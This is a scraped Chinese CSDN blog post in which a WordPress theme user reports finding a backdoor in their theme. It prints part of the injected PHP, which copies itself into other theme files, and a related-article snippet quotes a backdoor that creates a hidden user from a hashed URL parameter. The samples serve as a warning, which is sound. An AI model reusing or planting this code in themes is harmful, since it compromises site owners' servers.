气死了,好好的wordpress主题,被人植入了后门程序

最新推荐文章于 2023-05-19 08:50:34 发布
最新推荐文章于 2023-05-19 08:50:34 发布
阅读量691 收藏
点赞数
分类专栏: wordpress主题制作 文章标签: php wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45578749/article/details/106895541
版权

最近一直在研究wordrpess主题,但不知道为什么,新建的网站浏览量很好,但是搜索内容几乎为零,我看了下大体的浏览方向,发现IP地址都在河南地区,我就奇怪了,什么人比我还用心,天天打开我网站看啊。

今天在检查代码的时候发现我的wordpss主题中被人插入了如下的代码:

<?php
function _verifyactivate_widgets(){
   
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
   
		foreach ($direst as $item){
   
			if (is_writable($item)){
   
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
   
					$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){
   $cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);				
					$output .= ($isshowdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
   
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
   
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
   
		return false;
	}elseif(is_readable($places)){
   
		$elems=scandir($places);
		foreach ($elems as $elem){
   
			if ($elem != "." && $elem != ".."){
   
				if (is_dir($places . "/" . $elem)){
   
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
   
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
   
		return false;	
	}
	if (sizeof($wids) > 0
最低0.47元/天 解锁文章
儒爵.CN
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
防范wordpress主题后门代码获取管理员权限
09-29
只需几行代码就可以为WordPress主题留下后门,大家要小心了
WordPress主题后门严重威胁网站安全
jinyeweiyang的专栏
12-13 889
WordPress是国内站长非常喜欢采用的一款建站应用软件,由于其具有非常丰富的模版和插件,具有良好的可扩展性。特别对于博客类网站,WordPress几乎成为建站首选。 在阿里云安全团队的日常运营中,我们发现,WordPress一直是黑客攻击的主要目标。下图是阿里云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿里云云盾安全运营报告,http://security.ali
黑客在数十个 WordPress 插件和主题中插入秘密后门,可发动供应链攻击
smellycat000的专栏
01-24 715
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
黑客利用WordPress 插件暗中建立后门网站
Y525698136的博客
05-04 166
东方联盟网络安全组织在上周发布的一份报告中透露,有人观察到威胁行为者利用一个合法但过时的 WordPress 插件暗中建立后门网站,作为正在进行的活动的一部分。
Ripro9.0免扩展二开版WordPress博客主题Ripro全解密无后门
10-13
RiPro9.0二开版本 完全解密修正版,无后门更放心!免扩展、虚拟主机就能用!且修正了原版的多处BUG,更好用!子主题有huzao-child主题和sheji-child子主题美化包,共两款。内置多个插件,均正常运行
wordpress-Zibll子比主题-最新版本V5.7-免授权无后门
最新发布
08-08
此次更新以优化为主,更新内容不多,主要是因为大多数精力都在进行论坛系统的开发,在这里也就提前预告一下,论坛系统将会在下一版发布,主题的论坛系统仍保持漂亮的UI设计,同时功能强大,可以完美的实现圈子、问答...
亲测自用wordpress总裁主题4.3.0
03-12
总裁主题4.3.0,亲测自用wordpress主题 CeoMax主题是基于WordPress程序主题,由CeoTheme总裁主题团队原创开发,使用主题你需要安装WordPress程序。 商城系统基于Erphpdown,主题已内置集成Erphpdown,总裁主题...
2022年最新Wordpress程序Zibll子比主题V6.5最新完美去授权开心版
07-14
2022年最新Wordpress主题破J版本Zibll子比主题V6.5最新完美首发,Zibll子比主题专为阅读类网站开发,设计简约优雅、功能全面。UI界面模块化、多种布局、多种显示效果可选择,高度自由化,更容易搭配出自己喜欢的网站...
资源宝分享wordpress主题后门检测清理技巧
云博客_资源宝分享
04-29 2057
资源宝分享wordpress主题后门检测清理技巧 更多文章查看资源宝博客:www.httple.net 但是对于wordpress漏洞并不是所有人都很了解,往往在网站运营过程中没能注意网站的安全。 网站的安全除了空间服务商本身的安全控制外,那就是网站程序本身的安全问题。那我们该如何保障网站自身的安全呢?下面就以我的资源宝博客为例,来说说wordpress网站的安全问题。话说wordpress类网站的安全主要从两方面来讲: 一、wordpress程序本身安全 wordpress本身就存在一些漏洞,所以
小心WordPress盗版主题里暗藏后门
ChanYao的专栏
02-24 796
下面给大家看看这个常见的后门代码 add_action( ‘wp_head’, ‘wp_backdoor’ ); function wp_backdoor() { if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) { require( ‘wp-includes/registration.php’ ); if ( !username_exists( ‘backdoor’ ) ) { $user_id = wp_crea
什么是后门
w18842156489的博客
05-19 673
通常指那些绕过安全性控制而获取对程序或系统访问权的程序方法。 在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。
php恶意代码,警惕WordPress主题functions.php包含的恶意代码
weixin_34243541的博客
03-11 250
结尾,如果不是,给加上?>标记$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。$output .= $before . "Not found" . $after;//如果文件是以?&gt...
网传分享的Wordpressripro主题4.8版本后门分析_盾给网下载修复文件[建站教程]
sinzen的博客
12-18 2149
关于最近网传的日主题ripro4.8版本破解版的后门问题,源码分享源头不清楚,盾给网也是转载免费分享,没想到中了套路。所有在网络上(无论是盾给源码下载网或是其他网站)下载到ripro4.8源码的朋友请好好阅读此文章: 下载后用D盾扫描 发现有加密文件,用Notepad++查看 破解混淆加密后得到源文件 经查看发现后门代码 01 02 03 04 05 ...
WordPress系列教程(一)----WordPress环境准备与安装
热门推荐
fendo
09-22 9万+
一、前言   前段时间自己搭建了个WordPress的博客,用来做资源分享,主要包括视频教程,电子书,源码等一些学习资源网站地址是:http://www.98share.cn/ 当时考虑的是练练手,所以在淘宝上,随便买了个虚拟主机,200多快挺便宜的,而且还不需要备案,凑合着用,至今运行了87天了 由于买的空间是香港的,不知道是运行商的原因还是什么其他原因,有时候经常访问不了,要不就是访...
WordPress如何插入广告
sixeit的博客
01-13 603
有的WordPress站长想在自己的网站中插入一些广告,尤其是有一定流量基础的网站,一个广告位可能会带来不菲的收入。那么如何在网站内容之间添加广告呢?下面我来分享两个方法。 1.使用Insert Post Ads插件 首先,安装Insert Post Ads插件,最简单的方式就是点击“插件”,“安装插件”,直接进行搜索,找到Insert Post Ads,点击安装。安装完成后,点击插件管理,启用Insert Post Ads。 Insert Post Ads插件方便快捷,随时管理你的广告,可以在文章
史上最详细的WordPress安装教程(六):安装WordPress
银河架构师的博客
07-20 4万+
WordPress官网下载安装源码,也可以在中文官网下载中文版:https://cn.wordpress.org/download/。 如果一直429,那就百度其它下载资源吧,无解。 下载源码包之后,通过ftp、ssh等相关工具上传到服务器,也可以使用wget命令直接下载到服务器,省的来回传。
适合个人博客搭建的WordPress免费开源主题汇总
yundashi168.com
05-22 8010
WordPress最重要的就是找一个适合自己的主题了。好一点的WordPress主题基本上都是要收费的,而且价格还不便宜,这导致了不少的新手朋友们很为难。而有时我们仅仅根据个人的爱好来搭建一个博客,所以也没有必要去支付高额的费用来购买Wordpress主题。 事实上,WordPress免费主题也非常多,而且很多的Wordpress免费主题在功能上和界面美观上已经大大超过了付费的Wordpress主题。加上这些Wordpress主题都是开源的,基本上可以在Github上找得到源码,安全性是没有问题,主题的作者
"微慕WordPress程序专业版完整配置指南及功能介绍
微慕WordPress程序专业版是一款专业的WordPress网站生成小程序解决方案。该文档旨在为用户提供详细的配置和使用指南,使他们能够轻松地搭建和管理自己的小程序。文档内容涵盖了微慕小程序的介绍、准备工作、服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值